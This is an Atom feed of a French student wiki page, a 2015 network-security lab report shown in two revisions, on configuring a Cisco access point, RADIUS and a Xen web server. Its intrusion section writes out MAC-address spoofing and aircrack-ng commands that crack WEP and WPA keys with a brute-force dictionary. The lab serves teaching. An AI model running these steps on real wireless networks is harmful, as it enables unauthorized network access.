https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=Mstrunc
Wiki d'activités IMA - Contributions de l’utilisateur [fr]
2026-04-24T15:55:17Z
Contributions de l’utilisateur
MediaWiki 1.29.2
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23408
TP sysres IMA2a5 2015/2016 G3
2015-11-27T15:01:28Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<h2>Sécurisation Wifi par WPA2-EAP</h2><br />
<br />
<h3>Configuration du point d’accès</h3><br />
On commence par remettre le point d’accès en configuration d'usine <br />
<pre><br />
ap#erase startup-config<br />
ap#reload<br />
</pre><br />
<br />
Configuration:<br />
<pre><br />
ap(config)#line vty 0 15 <br />
ap(config-line)#password ****<br />
<br />
ap(config)#ip default-gateway 172.20.99.254<br />
<br />
ap(config)#interface bvi 1 <br />
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 <br />
</pre><br />
<br />
<h3>Configuration de la machine virtuel</h3><br />
<br />
On installe freeradius: <br />
<pre><br />
# apt-get install FreeRadius<br />
</pre><br />
<br />
On configure la conexion:<br />
<pre><br />
# nano eap.conf<br />
// on remplace <br />
default_eap_type = md5<br />
// par<br />
default_eap_type = peap<br />
<br />
# nano clients.conf <br />
client 172.20.99.0/24 {<br />
secret = topsecret<br />
shortname = wifi<br />
<br />
# nano users <br />
john Cleartext-Password := "****"<br />
<br />
# service freeradius restart<br />
</pre><br />
<br />
<pre><br />
<br />
telnet 172.20.99.5<br />
<br />
aaa authentication login eap_chien group radius_chien<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key secret_chien<br />
aaa group server radius radius_chien<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
<br />
dot11 ssid SSID_Chien<br />
vlan 6<br />
authentication open eap eap_chien<br />
authentication network-eap eap_chien<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
<br />
ssid SSID_Chien<br />
int dot11Radio 0.6<br />
encryption vlan 6 mode ciphers aes-ccm tkip<br />
encapsulation dot1Q 6<br />
bridge-group 6<br />
<br />
exit <br />
int gig0.6<br />
</pre><br />
<br />
<br />
<br />
<h3>Configuration du eeePc</h3><br />
<br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
# /etc/ssh/sshd_config<br />
# PermitRootLogin yes<br />
<br />
# if down eth0 <br />
# ifup etho<br />
# apt-get purge network-manage systemd <br />
# inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
# service bind9 stop<br />
# service bind9 start<br />
</pre><br />
<br />
<br />
Géneration d'une clés assymetrique:<br />
<pre><br />
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE love-in-the-world.space<br />
Generating key pair...........+++ ....................+++ <br />
Klove-in-the-world.space.+005+14281<br />
# mv Klove-in-the-world.space.+005+14281.key love-in-the-world-ksk.key<br />
# mv Klove-in-the-world.space.+005+14281.private love-in-the-world-ksk.private<br />
<br />
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE love-in-the-world.space<br />
Generating key pair........++++++ .....................++++++ <br />
Klove-in-the-world.space.+005+37866<br />
# mv Klove-in-the-world.space.+005+37866.key love-in-the-world-zsk.key<br />
# mv Klove-in-the-world.space.+005+37866.private love-in-the-world-zsk.private<br />
<br />
# dnssec-signzone -o love-in-the-world.space -k love-in-the-world-ksk ../db.love-in-the-world love-in-the-world-zsk<br />
Verifying the zone using the following algorithms: RSASHA1.<br />
Zone fully signed:<br />
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked<br />
ZSKs: 1 active, 0 stand-by, 0 revoked<br />
../db.love-in-the-world.signed<br />
root@chien:/etc/bind/love-in-the-world# <br />
<br />
:/etc/bind# nano named.conf.local <br />
zone "love-in-the-world.space"{<br />
<br />
type master;<br />
file "/etc/bind/db.love-in-the-world.signed";<br />
};<br />
</pre><br />
<br />
<br />
ensuite on copie le contenu du fichier:<br />
dans gandi.net <br />
<br />
<br />
on peut verifier que notre dns est secure a l'adresse suivante:<br />
http://dnsviz.net/d/love-in-the-world.space/dnssec/<br />
<br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
# apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
# nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
# newaliases<br />
# mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
# mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<pre><br />
#nano 000-domain.tld-ssl.conf<br />
<VirtualHost 193.48.57.181:443><br />
<br />
ServerName www.love-in-the-world.space<br />
ServerAlias love-in-the-world.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /root/chien.crt<br />
SSLCertificateKeyFile /root/chien.key<br />
SSLCertificateChainFile /root/gandi.crt<br />
SSLVerifyClient None<br />
<br />
</VirtualHost><br />
<br />
#a2enmod ssl<br />
#service apache2 reload<br />
</pre><br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
# cat /etc/network/interfaces<br />
# source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
# auto lo<br />
# iface lo inet loopback<br />
<br />
Ethernet interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 172.26.79.241<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
# apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
# ls<br />
# aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
# gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
# ./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23398
TP sysres IMA2a5 2015/2016 G3
2015-11-27T14:13:21Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<h2>Sécurisation Wifi par WPA2-EAP</h2><br />
<br />
<h3>Configuration du point d’accès</h3><br />
On commence par remettre le point d’accès en configuration d'usine <br />
<pre><br />
ap#erase startup-config<br />
ap#reload<br />
</pre><br />
<br />
Configuration:<br />
<pre><br />
ap(config)#line vty 0 15 <br />
ap(config-line)#password ****<br />
<br />
ap(config)#ip default-gateway 172.20.99.254<br />
<br />
ap(config)#interface bvi 1 <br />
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 <br />
</pre><br />
<br />
<h3>Configuration de la machine virtuel</h3><br />
<br />
On installe freeradius: <br />
<pre><br />
# apt-get install FreeRadius<br />
</pre><br />
<br />
On configure la conexion:<br />
<pre><br />
# nano eap.conf<br />
// on remplace <br />
default_eap_type = md5<br />
// par<br />
default_eap_type = peap<br />
<br />
# nano clients.conf <br />
client 172.20.99.0/24 {<br />
secret = topsecret<br />
shortname = wifi<br />
<br />
# nano users <br />
john Cleartext-Password := "****"<br />
<br />
# service freeradius restart<br />
</pre><br />
<br />
<h3>Configuration du eeePc</h3><br />
<br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
